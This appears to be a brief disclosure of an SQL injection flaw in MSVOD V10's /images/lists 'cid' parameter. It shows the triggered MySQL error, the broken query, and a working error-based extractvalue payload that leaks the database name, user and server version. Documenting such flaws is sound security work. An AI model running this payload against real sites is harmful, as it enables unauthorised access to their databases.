MSVOD V10 – SQL Injection

MSVOD V10 – SQL Injection via /images/lists

The $cid parameter controllable.

Open the page:/images/lists?cid=’

Then SQL will be error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' or ms_atlas.class in (12,13,19,22,23,24,35)) ) LIMIT 1' at line 1

And we can see that Error SQL  Statement:

SELECT COUNT(*) AS tp_count FROM `ms_atlas` WHERE ( ms_atlas.status = 1 and ms_atlas.is_check=1 and (ms_atlas.class = ' or ms_atlas.class in (12,13,19,22,23,24,35)) ) LIMIT 1

So Final Payload:


Official demo:,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20–%20